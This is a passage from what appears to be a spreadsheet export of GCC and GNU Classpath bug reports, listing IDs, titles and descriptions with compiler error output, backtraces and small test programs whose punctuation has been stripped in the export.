    <t>The 2011-05-19 change to convert collect2 to use the common diagnostics infrastructure broke collect2's handling of temporary files.  The original error reporting routines reported the error message and IMPORTANTLY called collect_exit(). collect_exit() removes temporary files through multiple invocations of maybe_unlink().
The change to invoke fatal_error() in GCC's diagnostics.c directly terminates without cleaning up the temporary files. This leaves at least 5 temporary files in /tmp for each link step that results in an error message.  When using GNU configure to probe system features this creates numerous temporary files.
For example
$ cat foo.c
int main () {}
$ gcc foo.c -lnonexistent
collect2: fatal error: library libnonexistent not found
compilation terminated.
$ ls /tmp/cc*
/tmp/cc0IcxVL.c   /tmp/ccKwuh03.x   /tmp/ccqMJsFn.le
/tmp/cc2taIMJ.ld  /tmp/cceKTq5n.o</t>
  </si>
  <si>
    <t>GCC-16489</t>
  </si>
  <si>
    <t>[3.3/3.4/4.0 Regression] G++ incorrectly rejects use of a null constant integral expression as a null constant pointer</t>
  </si>
  <si>
    <t>Consider
    const int NULL = 0
    int main() { double* p = NULL }
G++ incorrectly rejects the above.  This regression is also present
in GCC-3.3.x in direct violation of the C++ standard.</t>
  </si>
  <si>
    <t>GCC-78306</t>
  </si>
  <si>
    <t>[CilkPlus] inlining failed in call to always_inline â€˜memsetâ€™: function not inlinable with -fcilkplus</t>
  </si>
  <si>
    <t>Created attachment 40020
Preprocessed file
Hello everyone
I encountered a problem with compiling my code and wrote up a small snippet to reproduce the issue (see below). I get the error message inlining failed in call to always_inline â€˜memsetâ€™: function not inlinable when setting -fcilkplus.
Since I carefully read the bug reporting instructions here are the necessary informations:
GCC Version: 6.2.0 20161018 (Ubuntu 6.2.0-7ubuntu11).
Sytem type: x86_64-linux-gnu
GCC has been built with: ../src/configure -v --with-pkgversion='Ubuntu 6.2.0-7ubuntu11' --with-bugurl=file:///usr/share/doc/gcc-6/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-6 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-6-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-6-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-6-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Complete commandline that triggers the bug: gcc-6 -O2 -fcilkplus -o test3 test3.c (it won't happen with -O0 but you can also use -O1 -O3 and -Os)
Compiler output:
In file included from /usr/include/features.h:364:0
                 from /usr/include/string.h:25
                 from test3.c:2:
test3.c: In function â€˜sumâ€™:
/usr/include/x86_64-linux-gnu/bits/string3.h:78:1: error: inlining failed in call to always_inline â€˜memsetâ€™: function not inlinable
 __NTH (memset (void *__dest int __ch size_t __len))
 ^
test3.c:16:3: note: called from here
   memset(foo 0 64*sizeof(int)) // &lt;--- Fails
   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source code:
---------------------------------------
#include 
#include 
#include 
int sum(int low int high) {
  if(low == high) {
    return low
  }
  int mid = low + (high-low)/2
  int a = cilk_spawn sum(low mid)
  int b = sum(mid+1 high)
  // Some very expensive computation here
  int foo[64]
  memset(foo 0 64*sizeof(int)) // &lt;--- Fails
  cilk_sync
  return a+b
}
int main(void) {
  return sum(0 100)
}
---------------------------------------
I have attached the preprocessed file (because it's quite lengthy).
I think there was a similar bug in GCC 5 when using intrinsics but that has been fixed in GCC 6 (see http://stackoverflow.com/q/31846389/773690 - Code compiles just fine) so that might me a regression or other edge case.
If there is a workaround I can do that would be greatly appreciated if you could give a short hint. clang compiles the code just fine (but generates slow code) and icc is expensive.
Thank you very much!</t>
  </si>
  <si>
    <t>iblue</t>
  </si>
  <si>
    <t>GCC-79653</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ICE on invalid c++ code in cp_check_const_attributes in cp/decl2.c:1423</t>
  </si>
  <si>
    <t>Created attachment 40791
test-case
Adopted from clang:
$ g++ /home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp:3:28: error: requested alignment is not a positive power of 2
 int align_illegal alignas(3) //expected-error {{requested alignment is not a power of 2}}
                            ^
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp:11:25: error: function definition does not declare parameters
   int bitfield alignas(1) : 1 // expected-error {{}}
                         ^
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp:14:24: error: alignment may not be specified for â€˜câ€™
 void f(alignas(1) char c) { // expected-error {{'alignas' attribute cannot be applied to a function parameter}}
                        ^
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp:26:19: error: expansion pattern â€˜#â€˜tree_listâ€™ not supported by dump_expr#â€™ contains no argument packs
 struct alignas(int...) alignas_expansion_no_packs {} // expected-error {{pack expansion does not contain any unexpanded parameter packs}}
                   ^~~
/home/marxin/BIG/Programming/llvm-project/llvm/tools/clang/test/SemaCXX/attr-cxx0x.cpp:26:24: internal compiler error: tree check: expected tree_list have error_mark in cp_check_const_attributes at cp/decl2.c:1351
 struct alignas(int...) alignas_expansion_no_packs {} // expected-error {{pack expansion does not contain any unexpanded parameter packs}}
                        ^~~~~~~~~~~~~~~~~~~~~~~~~~
0x15410ca tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc/tree.c:9815
0x80d4d6 tree_check(tree_node* char const* int char const* tree_code)
	../../gcc/tree.h:3064
0x95cfd7 cp_check_const_attributes
	../../gcc/cp/decl2.c:1351
0x95d5ce cplus_decl_attributes(tree_node** tree_node* int)
	../../gcc/cp/decl2.c:1423
0x9b04ca cp_parser_class_head
	../../gcc/cp/parser.c:22805
0x9ae06f cp_parser_class_specifier_1
	../../gcc/cp/parser.c:22055
0x9af194 cp_parser_class_specifier
	../../gcc/cp/parser.c:22368
0x9a2ec6 cp_parser_type_specifier
	../../gcc/cp/parser.c:16441
0x99dd17 cp_parser_decl_specifier_seq
	../../gcc/cp/parser.c:13352
0x99c73a cp_parser_simple_declaration
	../../gcc/cp/parser.c:12676
0x99c6c2 cp_parser_block_declaration
	../../gcc/cp/parser.c:12621
0x99c444 cp_parser_declaration
	../../gcc/cp/parser.c:12518
0x99bf9d cp_parser_declaration_seq_opt
	../../gcc/cp/parser.c:12394
0x98a935 cp_parser_translation_unit
	../../gcc/cp/parser.c:4366
0x9dbd52 c_parse_file()
	../../gcc/cp/parser.c:38430
0xb8e93c c_common_parse_file()
	../../gcc/c-family/c-opts.c:1107</t>
  </si>
  <si>
    <t>GCC-16254</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in lower_stmt at gimple-low.c:205</t>
  </si>
  <si>
    <t>/opt/gcc35/libexec/gcc/i686-pc-linux-gnu/3.5.0/cc1plus -fpreprocessed
nsNSSCallbacks.ii -quiet -dumpbase nsNSSCallbacks.ii -auxbase-strip
nsNSSCallbacks.o  -version -fno-rtti -fno-exceptions -o nsNSSCallbacks.s
GNU C++ version 3.5.0 20040629 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.5.0 20040629 (experimental).
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64442
 nsNSSCallbacks.ii: In function `void foo(int)':
nsNSSCallbacks.ii:12: internal compiler error: in lower_stmt at gimple-low.c:205
Configured with: ../configure --prefix=/opt/gcc35 --enable-shared
--enable-threads --enable-__cxa_atexit --enable-languages=cc++
--enable-clocale=gnu --disable-nls --disable-checking --disable-libmudflap
Thread model: posix
========================================================
struct A
  {
      ~A()
      A(int)
  }
int bar( const A
void foo(int i) {
  int format[1] = { bar( A(i) ) }
}
========================================================</t>
  </si>
  <si>
    <t>GCC-3299</t>
  </si>
  <si>
    <t>__attribute__((aligned(16))) seems to be ignored on x86</t>
  </si>
  <si>
    <t>The following code (which doesn't include anything so it's the same as the .ii that is generated) seg faults because none of v1 v2 or ret are aligned to a 16 byte boundary as required for the movaps instruction:
---cut here---
class vector
{
public:
    float x
    float y
    float z
    float w
    vector(float _x float _y float _z float _w)
            : x(_x) y(_y) z(_z) w(_w)
        {}
    vector()
        {}
    vector operator+(const vector &amp;v1)
        {
            vector ret __attribute__((aligned(16)))
            asm(movl   %1      %%esi   \n
                movl   %2      %%edi   \n
                movaps (%%esi) %%xmm0  \n
                addps  (%%edi) %%xmm0  \n
                movaps %%xmm0  %0      \n
                : =g (ret) : r (this) r (
            return ret
        }
} __attribute__((aligned(16)))
int main(int argc char *argv[])
{
    vector v1(3.0f 4.0f 5.0f 1.0f)
    vector v2(7.0f 1.0f 9.0f 1.0f)
    vector ans = v1 + v2
}
---cut here---
Here is the output I get:
$ g++ -v -save-temps -Wall -g sse.cpp -o sse
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease)
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -g -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di586 -Dpentium -D__i586 -D__i586__ -D__pentium -D__pentium__ sse.cpp sse.ii
GNU CPP version 2.95.3 19991030 (prerelease) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/../../../../i586-mandrake-linux/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/cc1plus sse.ii -quiet -dumpbase sse.cc -g -Wall -version -o sse.s
GNU C++ version 2.95.3 19991030 (prerelease) (i586-mandrake-linux) compiled by GNU C version 2.95.3 19991030 (prerelease).
sse.cpp: In function `int main(int char **)':
sse.cpp:36: warning: unused variable `class vector ans'
 as -V -Qy -o sse.o sse.s
GNU assembler version 2.10.91 (i686-mandrake-linux) using BFD version 2.10.91.0.2
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o sse /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/crtbegin.o -L/usr/lib/gcc-lib/i586-mandrake-linux/2.95.3 -L/usr/i586-mandrake-linux/lib sse.o -lstdc++ -lm -lgcc -lc -lgcc /usr/lib/gcc-lib/i586-mandrake-linux/2.95.3/crtend.o /usr/lib/crtn.o
I also tried the equivalent C code and compiling with gcc but I got the same problem.
This problem also exists for these other versions of gcc:
---
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/2.95.3-5/specs
gcc version 2.95.3-5 (cygwin special)
---
Using builtin specs.
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable
-long-long --enable-cstdio=stdio --enable-clocale=generic --enable-languages=cc++f77objcjava --program-suffix=-3.0 --enable-objc-gc --host=i686-mandrake-linux
Thread model: posix
gcc version 3.0
---
(But my 3.0 installation may not be correct so you may want to ignore that)
Release:
gcc version 2.95.3 19991030 (prerelease)
Environment:
Linux 2.4.5-6mdksmp #1 SMP Mon Jun 18 10:19:22 PDT 2001 i686 unknown
How-To-Repeat:
- compile the sample code on a PIII
- run it.</t>
  </si>
  <si>
    <t>ryants</t>
  </si>
  <si>
    <t>GCC-53703</t>
  </si>
  <si>
    <t>[4.8 Regression] verify_ssa: definition in block 105 does not dominate use in block 103</t>
  </si>
  <si>
    <t>Created attachment 27639
C source code
I just tried to compile the package gnet2-2.0.8-6
on gcc-4.8 trunk dated 20120617 on an AMD x86_64 box.
The compiler said
usagi_ifaddrs.c:428:1: error: definition in block 105 does not dominate use in block 103
 usagi_getifaddrs (struct ifaddrs **ifap)
 ^
for SSA_NAME: .MEM_375 in statement:
# VUSE 
D.5483_238 = ifamap.address_len
usagi_ifaddrs.c:428:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-19754</t>
  </si>
  <si>
    <t>Shape conformance not checked</t>
  </si>
  <si>
    <t>On the attached sample code the compiler fails to issue a shape conformance
error message which is indeed printed by other compilers (e.g. Intel 8.1)
[sfilippo@localhost TEMP]$ gfortran -v
Using built-in specs.
Configured with: ../gcc-4.0-20050130/configure --prefix=/usr/local/gfortran
Thread model: posix
gcc version 4.0.0 20050130 (experimental)
[sfilippo@localhost TEMP]$ gfortran -o tmp1 tmp1.f90</t>
  </si>
  <si>
    <t>GCC-66134</t>
  </si>
  <si>
    <t>[CHKP] ICE: Unable to coalesce ssa_names 18 and 17 which are marked as MUST COALESCE</t>
  </si>
  <si>
    <t>Created attachment 35536
reproducer
&gt;gcc -O2 -fcheck-pointer-bounds -mmpx -fno-tree-ccp test.c -c
Unable to coalesce ssa_names 18 and 17 which are marked as MUST COALESCE.
__bound_tmp.0_18(ab) and  __bound_tmp.0_17(ab)
LCK-2257.c: In function 'test.chkp':
LCK-2257.c:7:6: internal compiler error: SSA corruption
 void test (int *p)
      ^
0xd3a93d fail_abnormal_edge_coalesce
        ../../gcc-5/gcc/tree-ssa-coalesce.c:927
0xd3b74c coalesce_partitions
        ../../gcc-5/gcc/tree-ssa-coalesce.c:1230
0xd3bd02 coalesce_ssa_name()
        ../../gcc-5/gcc/tree-ssa-coalesce.c:1375
0xcd82d3 remove_ssa_form
        ../../gcc-5/gcc/tree-outof-ssa.c:1018
0xcd8b3d rewrite_out_of_ssa(ssaexpand*)
        ../../gcc-5/gcc/tree-outof-ssa.c:1252
0x7b5c23 execute
        ../../gcc-5/gcc/cfgexpand.c:5932
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-79964</t>
  </si>
  <si>
    <t>Cortex A53 codegen still not optimal</t>
  </si>
  <si>
    <t>Two data points:
- the integer benchmark from PR79665 runs about 7% slower with -mcpu=cortex-a53 vs other targets equalling generic codegen. It was still indistinguishable on 20170220 so the regression must have happened shortly after as per PR79665#c13
- c-ray again wherein dispensing with -mfix-cortex-a53-843419 removes the handicap but e.g. A57 codegen produces the best result ever on this machine:
http://openbenchmarking.org/result/1703089-RI-1703040RI07
Coming from a Cortex A53 with 32kB of L1 cache.</t>
  </si>
  <si>
    <t>tulipawn</t>
  </si>
  <si>
    <t>GCC-20811</t>
  </si>
  <si>
    <t>gfortran include problem (regression from g77)</t>
  </si>
  <si>
    <t>Hello
doing some experiments with gfortran I stumbled across the following
bug/regression with respect to g77:
consider these two files in a directory test:
$ cat test/foo.f:
      subroutine foo
      include   'test.h'
      end
$ cat test/test.h
c  just a comment
Now compiling with g77:
~ $ g77 -c test/foo.f
[works ok]
and with gfortran:
~ $ gfortran -c test/foo.f
Error: Can't open included file 'test.h'
If I compile within test:
~/test $ gfortran -c foo.f
[works ok]
everything is fine.
But include is IMHO supposed to include from where the source file is located
not only in the current directory?
Greetings
Andreas</t>
  </si>
  <si>
    <t>afranck</t>
  </si>
  <si>
    <t>GCC-50199</t>
  </si>
  <si>
    <t>[5 Regression] wrong code with -flto -fno-merge-constants</t>
  </si>
  <si>
    <t>Created attachment 25111
reduced testcase
Output:
$ gcc -O2 -flto -fno-merge-constants --param lto-min-partition=1 testcase.c
$ ./a.out 
Aborted
Tested revisions:
r178096 - fail
r178005 - fail
r177982 - OK</t>
  </si>
  <si>
    <t>GCC-71190</t>
  </si>
  <si>
    <t>[7 Regression] ICE in assemble_variable_contents at varasm.c:2054</t>
  </si>
  <si>
    <t>Probably since the PR69708 fix went in the final Firefox -flto libxul link fails.
lto1: internal compiler error: in assemble_variable_contents at varasm.c:2054
0x10ad35f3 assemble_variable_contents
        ../../gcc/gcc/varasm.c:2054
0x10ad3b0f output_object_block
        ../../gcc/gcc/varasm.c:7400
0x10ad3b0f output_object_blocks()
        ../../gcc/gcc/varasm.c:7460
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[6]: *** [/home/trippels/tmp/ccTKZtgV.ltrans56.ltrans.o] Error 1
make[6]: *** Waiting for unfinished jobs....
lto1: internal compiler error: in assemble_variable_contents at varasm.c:2054
0x10ad35f3 assemble_variable_contents
        ../../gcc/gcc/varasm.c:2054
0x10ad3b0f output_object_block
        ../../gcc/gcc/varasm.c:7400
0x10ad3b0f output_object_blocks()
        ../../gcc/gcc/varasm.c:7460
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[6]: *** [/home/trippels/tmp/ccTKZtgV.ltrans43.ltrans.o] Error 1
lto-wrapper: fatal error: make returned 2 exit status
compilation terminated.
/home/trippels/bin/ld: fatal error: lto-wrapper failed
I hope that someone comes up with a smaller testcase.
To reproduce build Firefox with -O3 -flto.</t>
  </si>
  <si>
    <t>GCC-68541</t>
  </si>
  <si>
    <t>[6 Regression] Path splitting causes if-conversion miss</t>
  </si>
  <si>
    <t>Created attachment 36835
A reproducer
Due to path splitting on SSA trees introduced in r230364 we miss an if-conversion opportunity for (cond ? s++ : s--) expressions.
As for now (r230865) when compiling the attached testcase with -O2 after RTL ce1 pass we have
3 possible IF blocks searched.
1 IF blocks converted.
2 true changes made.
while compiling it with -O2 -fno-split-paths results in
1 possible IF blocks searched. 
0 IF blocks converted.
0 true changes made.</t>
  </si>
  <si>
    <t>afomin.mailbox</t>
  </si>
  <si>
    <t>GCC-30370</t>
  </si>
  <si>
    <t>[4.1 regression] Build failure in libgcc2 powitf2 with ICE in gen_reg_rtx</t>
  </si>
  <si>
    <t xml:space="preserve">On an i686-pc-linux-gnu host I configure GCC 4.3 (revision 120287) like this:
../../src/gcc/configure --enable-sim --with-newlib --disable-nls --enable-e500_double --prefix=${HOME} --enable-checking=yesrtl --disable-threads --disable-shared --without-long-double-128 --target=powerpc-unknown-eabispe
(I also tried --with-long-double-128 as well as not specifying this option at all with the same result.)
The build fails compiling libgcc/__powitf2.o:
/home/rask/build/gcc-ppc/./gcc/xgcc -B/home/rask/build/gcc-ppc/./gcc/ -nostdinc -B/home/rask/build/gcc-ppc/powerpc-unknown-eabispe/newlib/ -isystem /home/rask/build/gcc-ppc/powerpc-unknown-eabispe/newlib/targ-include -isystem /home/rask/src/gcc/newlib/libc/include -B/home/rask/powerpc-unknown-eabispe/bin/ -B/home/rask/powerpc-unknown-eabispe/lib/ -isystem /home/rask/powerpc-unknown-eabispe/include -isystem /home/rask/powerpc-unknown-eabispe/sys-include -L/home/rask/build/gcc-ppc/./ld -O2  -O2 -g -O2  -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -specs=ldblspecs -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I../../../src/gcc/gcc -I../../../src/gcc/gcc/. -I../../../src/gcc/gcc/../include -I../../../src/gcc/gcc/../libcpp/include  -I../../../src/gcc/gcc/../libdecnumber -I../libdecnumber -DL_powitf2 -c ../../../src/gcc/gcc/libgcc2.c -o libgcc/./_powitf2.o
../../../src/gcc/gcc/libgcc2.c: In function '__powitf2':
../../../src/gcc/gcc/libgcc2.c:1735: internal compiler error: in gen_reg_rtx at emit-rtl.c:770
This is a regression from GCC 4.1 where GCC built for this target: </t>
  </si>
  <si>
    <t>GCC-583</t>
  </si>
  <si>
    <t>Re: c++/581: divide by zero and floating point exceptions  not caught</t>
  </si>
  <si>
    <t xml:space="preserve"> Hugo.Mildenberger@topmail.de writes:
 [snip]
 &gt; Division by zero and floating point exceptions are not
 &gt; caught by a general catch(...) handler. Instead the program 
 &gt; is aborted with the Floating point exception message.
 &gt; &gt;How-To-Repeat:
 'Floating point exceptions' and C++ exceptions are two very different
   beasts and the C++ standard does not require an implementation to
   map one to the other. (See 5/5 .)
 Floating point exceptions are initiated by the cpu whereas C++
   exceptions are initiated by a throw expression.
 Note that there are architectures where mapping a floating point
   exception to a C++ exception would either be infeasible or would
   dramaticly reduce performance.
 So this is not a bug in gcc it is a bug in your code.
 &gt; g++ -fexceptions -O0 
 &gt; 
 &gt; include 
 &gt; 
 &gt; int main()
 &gt; {
 &gt; 
 &gt;   try {
 &gt;          printf(hello 1\n)
 &gt;          int r=1
 &gt;          int k=0
 &gt;          int j=r/k
 &gt;          printf(no exception 1\n)
 &gt;   
 &gt;       }
 &gt;   catch(...)
 &gt;        {
 &gt;          printf(exception caught 1\n)
 &gt;        }
 &gt;   try  {
 &gt;          printf(hello 2\n)
 &gt;          double r=1
 &gt;          double k=0
 &gt;          double j=r/k
 &gt;          printf(no exception 2\n)
 &gt;         
 &gt;      
 &gt;        }
 &gt;   catch(...)
 &gt;        {
 &gt;          printf(exception caught 2\n)
 &gt;        }
 &gt;  printf(leaving\n)
 &gt; 
 &gt;  return 0
 &gt; }
 [snip]
 Thank you for your bug report.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-39055</t>
  </si>
  <si>
    <t>[DR 1443][4.4/4.5/4.6/4.7 regression] questionable default parameter of a member function accepted</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 3.4.0:
==============================
template struct A
{
  int i
  A() { void foo(int=i) }
}
A a
==============================
bug.cc: In function 'void foo(int) [with int  = 0]':
bug.cc:4:   instantiated from 'A &gt;::A() [with int  = 0]'
bug.cc:7:   instantiated from here
bug.cc:4: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
GCC 3.3.x wrongly rejected the code ('i' as default parameter is not OK
but this should only be diagnosed if the default parameter is actually used).
GCC 3.[012].x correctly accepted the code.
Btw the code compiles fine if A is not a template class.</t>
  </si>
  <si>
    <t>GCC-5146</t>
  </si>
  <si>
    <t>[cygwin] Failure of test 23_containers/set_operators.cc</t>
  </si>
  <si>
    <t>Test 23_containers/set_operators.cc fails on cygwin.  This may be related to PR libstdc++/5145.
The warning is 
/usr/local/src/gcc/libstdc++-v3/testsuite/23_containers/set_operators.cc:40: no 
   match for `std::_Rb_tree_iterator&lt;unsigned int const unsigned int&amp; const 
   unsigned int*&gt;&amp; != std::_Rb_tree_iterator&lt;std::string const std::string&amp; 
   const std::string*&gt;' operator
Full output attached
Benjamin Kosnik  writes:
both libstdc++/5145 and libstdc++/5146 are the same issue.
These tests should fail if they don't it's an error. 
You'd think that this is just a question of doing 
dg-error on the line in question but it doesn't seem 
to work with multi-line C++ errors or something so
the excess errors part was put in.
If you can think of a better way to do this and or one 
that eliminates the excess errors markings in these two
files I'm all ears.
-benjamin
Release:
gcc 3.1 2001-12-17
Environment:
i686-pc-cygwin
How-To-Repeat:
${srcdir}/configure --host=i686-pc-cygwin --enable-threads=posix --disable-libgcj --enable-sjlj-exceptions --with-system-zlib --disable-nls --disable-shared
make
make check</t>
  </si>
  <si>
    <t>GCC-3636</t>
  </si>
  <si>
    <t>make[4]: *** No rule to make target `atan2f.lo' needed by `libmath.la'.  Stop.</t>
  </si>
  <si>
    <t>/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/gcc/xgcc -B/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/gcc/ -B/usr/lsd5.8/sparc-sun-solaris2.8/bin/ -B/usr/lsd/SunOS.5.8/sparc-sun-solaris2.8/lib/ -isystem /usr/lsd/SunOS.5.8/sparc-sun-s.8/include -DHAVE_CONFIG_H -I. -I../../../../libstdc++-v3/libmath -I.. -I../../../../libstdc++-v3/include -I../incluO2 -c ../../../../libstdc++-v3/libmath/hypotf.c  -fPIC -DPIC -o .libs/hypotf.o
/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/gcc/xgcc -B/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/gcc/ -B/usr/lsd5.8/sparc-sun-solaris2.8/bin/ -B/usr/lsd/SunOS.5.8/sparc-sun-solaris2.8/lib/ -isystem /usr/lsd/SunOS.5.8/sparc-sun-s.8/include -DHAVE_CONFIG_H -I. -I../../../../libstdc++-v3/libmath -I.. -I../../../../libstdc++-v3/include -I../incluO2 -c ../../../../libstdc++-v3/libmath/hypotf.c -o hypotf.o &gt;/dev/null 2&gt;&amp;1
make[4]: *** No rule to make target `atan2f.lo' needed by `libmath.la'.  Stop.
make[4]: Leaving directory `/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/sparc-sun-solaris2.8/libstdc++-v3/libmath'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/sparc-sun-solaris2.8/libstdc++-v3'
make[2]: *** [all-recursive-am] Error 2
make[2]: Leaving directory `/tmp/tools/gcc-20010709/sparc-sun-solaris2.8/sparc-sun-solaris2.8/libstdc++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/tmp/tools/gcc-20010709/sparc-sun-solaris2.8'
make: *** [bootstrap] Error 2
Release:
gcc version 3.0.1 20010618 (prerelease)
Environment:
solaris 2.8 binutils 2.11.2 gcc-3.0.1 20010618
How-To-Repeat:
see the bld.log file</t>
  </si>
  <si>
    <t>GCC-42545</t>
  </si>
  <si>
    <t>type extension: parent component has wrong accessibility</t>
  </si>
  <si>
    <t>Reported by Reinhold Bader.
The error occurs for inherited type-bound procedures where the extending type has PRIVATE for the components and the TBP procedure is accessed using the syntax
    %  % 
The error message is as follows:
mr_shorter.f90:23.14:
  call  obj%tt%set()
              1
Error: All components of 'ttt' are PRIVATE in structure constructor at (1)
The error is wrong for two reasons:
a) There is no structure constructure visible at all
b) This TBP is public as there is no PRIVATE statement below the CONTAINS in the type declaration.
See 4.5.4 Type-bound procedures and esp. last two normative paragraphs of this section. And see 4.5.6.1 Inheritance (all refs are F2003):
An extended type has a scalar nonpointer nonallocatable parent component with the type and type parameters of the parent type. The name of this component is the parent type name. It has the accessibility of the parent type.
! -----------------------------------------
module mo
  implicit none
  type :: tt
    private
    integer :: i = 1
  contains
    procedure :: set
  end type
  type extends(tt) :: ttt
    private ! &lt;&lt;&lt;&lt;&lt;&lt;&lt;
    real :: x = 2.0
  end type
contains
  subroutine set(this)
    class(tt) :: this
    this%i = -1
  end subroutine
end module
program pr
  use mo
  implicit none
  type(ttt) :: obj
  call  obj%tt%set()
end program
! -------------------
Variants to check:
type tt
 ...
contains
  PRIVATE
! (and optionally set explicitly marked as public)
-- and/or --
type extends(tt) :: t
 ...
contains
  PRIVATE</t>
  </si>
  <si>
    <t>CLASSPATH-22638</t>
  </si>
  <si>
    <t>bug in java.util.zip.InflaterDynHeader</t>
  </si>
  <si>
    <t>On large ZIP files the InflaterDynHeader
throws an exception in the 'case LREPS:'.
The ZIP file is valid but it has around 12MB ...
write to mike@icsharpcode.net for the file (I don't know
if it is a little to big to upload it here)</t>
  </si>
  <si>
    <t>GCC-3321</t>
  </si>
  <si>
    <t>make bootstrap fails on i686-pc-cygwin - #include nested too deeply</t>
  </si>
  <si>
    <t>make bootstrap operation fails apparently due to infinite recursion within header files (missing compile guards?) in configure/make generated files: tm.h tconfig.h etc.
Sources in /usr/src/gcc-3.0
Build in /usr/build/gcc-3.0
Commands used:
cd /usr/build/gcc-3.0
/usr/src/gcc-3.0/configure --prefix=/usr
make bootstrap
Output from configure and make attached (in file confmak.out)
Release:
GCC-3.0
Environment:
Cygwin (DLL major = 21 minor = 0 epoch = 19 hosted on Win NT 4.0 SP4).
All files on NTFS partition.
CYGWIN environment variable = ntsec ntea tty
Compiling with gcc version 2.95.2-6 19991024
SGI Visual Workstation 320 with 500MHz Intel Pentium III
How-To-Repeat:
On my machine simply execute the above commands - reproduces every time.</t>
  </si>
  <si>
    <t>GCC-10830</t>
  </si>
  <si>
    <t>unexpected error with g++ and gcc</t>
  </si>
  <si>
    <t xml:space="preserve"> This is a multi-part message in MIME format.
 ------=_NextPart_000_002E_01C31C5A.59D261A0
 Content-Type: multipart/alternative
 	boundary=----=_NextPart_001_002F_01C31C5A.59D261A0
 ------=_NextPart_001_002F_01C31C5A.59D261A0
 Content-Type: text/plain
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 see attachment for more detail
 please help me to find a solution
 ------=_NextPart_001_002F_01C31C5A.59D261A0
 Content-Type: text/html
 	charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;META http-equiv=3DContent-Type content=3Dtext/html =
 charset=3Diso-8859-1&gt;
 see attachment for more =
 detail
 please help me to find a=20
 solution
 ------=_NextPart_001_002F_01C31C5A.59D261A0--
 ------=_NextPart_000_002E_01C31C5A.59D261A0
